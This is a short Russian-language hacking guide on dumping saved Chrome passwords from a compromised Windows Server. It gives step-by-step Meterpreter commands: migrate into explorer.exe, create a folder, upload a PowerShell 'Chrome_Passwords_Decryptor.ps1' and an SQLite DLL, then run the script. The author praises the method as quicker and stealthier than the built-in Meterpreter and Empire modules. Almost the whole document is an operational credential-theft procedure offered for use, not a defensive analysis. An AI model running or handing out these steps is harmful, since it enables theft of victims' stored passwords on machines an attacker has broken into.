Dump Chrome Passwords

Атакующая машина : Kali linux 2017.3

Атакуемая машина : Windows Server 2012 R2 (EN)

Что нужно ?

1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

pgrep explorer
pid - ваш explorer
migrate pid

Создание каталога: 

mkdir Pass
cd Pass

Загрузка файлов в созданный каталог (test):

upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll

3. Потереть ручки и выполнить следующую команду:

powershell -file Chrome_Passwords_Decryptor.ps1

Отлично, на выходе получаем вот это 

P.S. Если не мигрировать, то пассов Вам не видать.​

Я бы даже выделил следующие преимущества:

1. Просто в исполнении.
2. Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
3. Не требует закрытие процесса Хром в отличии от модуля в Empire.

P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч!